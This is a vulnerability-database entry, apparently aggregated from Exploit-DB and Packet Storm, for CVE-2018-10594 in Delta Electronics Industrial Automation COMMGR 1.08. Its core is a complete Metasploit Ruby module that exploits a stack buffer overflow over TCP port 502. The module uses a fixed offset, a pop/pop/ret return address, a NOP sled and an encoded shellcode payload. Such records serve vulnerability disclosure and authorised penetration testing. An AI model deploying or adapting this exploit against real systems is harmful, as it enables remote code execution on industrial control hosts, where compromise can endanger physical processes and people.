ID

VAR-E-201807-0027


CVE

cve_id:CVE-2018-10594

Trust: 3.1

sources: PACKETSTORM: 148381 // PACKETSTORM: 149741 // PACKETSTORM: 149715 // EXPLOIT-DB: 45574 // EDBNET: 99652

EDB ID

45574


TITLE

Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit) - Windows remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 45574

DESCRIPTION

Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit). CVE-2018-10594 . remote exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 45574

AFFECTED PRODUCTS

vendor:deltamodel:electronics delta industrial automation commgrscope:eqversion:1.08

Trust: 2.1

vendor:deltamodel:industrial automation commgrscope:eqversion:1.08

Trust: 0.5

vendor:deltamodel:electronics delta industrial automation commgr stackscope:eqversion:1.08

Trust: 0.5

sources: PACKETSTORM: 148381 // PACKETSTORM: 149741 // PACKETSTORM: 149715 // EXPLOIT-DB: 45574 // EDBNET: 99652

EXPLOIT

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
crafted packets. This module has been tested successfully on Delta Electronics Delta
Industrial Automation COMMGR 1.08 over
Windows XP SP3,
Windows 7 SP1, and
Windows 8.1.
},
'Author' =>
[
'ZDI', # Initial discovery
't4rkd3vilz', # PoC
'hubertwslin' # Metasploit module
],
'References' =>
[
[ 'CVE', '2018-10594' ],
[ 'BID', '104529' ],
[ 'ZDI', '18-586' ],
[ 'ZDI', '18-588' ],
[ 'EDB', '44965' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01' ]
],
'Payload' =>
{
'Space' => 640,
'DisableNops' => true,
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Targets' =>
[
[ 'COMMGR 1.08 / Windows Universal',
{
'Ret' => 0x00401e14, # p/p/r COMMGR.exe
'Offset' => 4164
}
],
],
'DisclosureDate' => 'Jul 02 2018',
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(502)
])
end

def exploit
data = rand_text_alpha(target['Offset'])
data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled
data << [target.ret].pack("V")
data << make_nops(40)
data << payload.encoded

print_status("Trying target #{target.name}, sending #{data.length} bytes...")
connect
sock.put(data)
disconnect
end
end

Trust: 1.0

sources: EXPLOIT-DB: 45574

EXPLOIT LANGUAGE

rb

Trust: 0.6

sources: EXPLOIT-DB: 45574

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 45574

TYPE

Stack Buffer Overflow (Metasploit)

Trust: 1.6

sources: EXPLOIT-DB: 45574 // EDBNET: 99652

TAGS

tag:exploit

Trust: 1.5

tag:overflow

Trust: 1.5

tag:Metasploit Framework (MSF)

Trust: 1.0

tag:Remote

Trust: 1.0

tag:proof of concept

Trust: 0.5

sources: PACKETSTORM: 148381 // PACKETSTORM: 149741 // PACKETSTORM: 149715 // EXPLOIT-DB: 45574

CREDITS

Metasploit

Trust: 0.6

sources: EXPLOIT-DB: 45574

EXTERNAL IDS

db:NVDid:CVE-2018-10594

Trust: 3.1

db:ICS CERTid:ICSA-18-172-01

Trust: 1.6

db:EXPLOIT-DBid:45574

Trust: 1.6

db:EDBNETid:99652

Trust: 0.6

db:PACKETSTORMid:148381

Trust: 0.5

db:PACKETSTORMid:149741

Trust: 0.5

db:PACKETSTORMid:149715

Trust: 0.5

sources: PACKETSTORM: 148381 // PACKETSTORM: 149741 // PACKETSTORM: 149715 // EXPLOIT-DB: 45574 // EDBNET: 99652

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2018-10594

Trust: 3.1

url:https://raw.githubusercontent.com/rapid7/metasploit-framework/96681b03d123605f3963c519ccb3000efcfe3ed1/modules/exploits/windows/scada/delta_ia_commgr_bof.rb

Trust: 1.0

url:https://www.exploit-db.com/exploits/45574/

Trust: 0.6

sources: PACKETSTORM: 148381 // PACKETSTORM: 149741 // PACKETSTORM: 149715 // EXPLOIT-DB: 45574 // EDBNET: 99652

SOURCES

db:PACKETSTORMid:148381
db:PACKETSTORMid:149741
db:PACKETSTORMid:149715
db:EXPLOIT-DBid:45574
db:EDBNETid:99652

LAST UPDATE DATE

2022-07-27T09:21:21.304000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:148381date:2018-07-02T16:17:06
db:PACKETSTORMid:149741date:2018-10-10T17:28:04
db:PACKETSTORMid:149715date:2018-10-08T16:17:57
db:EXPLOIT-DBid:45574date:2018-10-09T00:00:00
db:EDBNETid:99652date:2018-10-09T00:00:00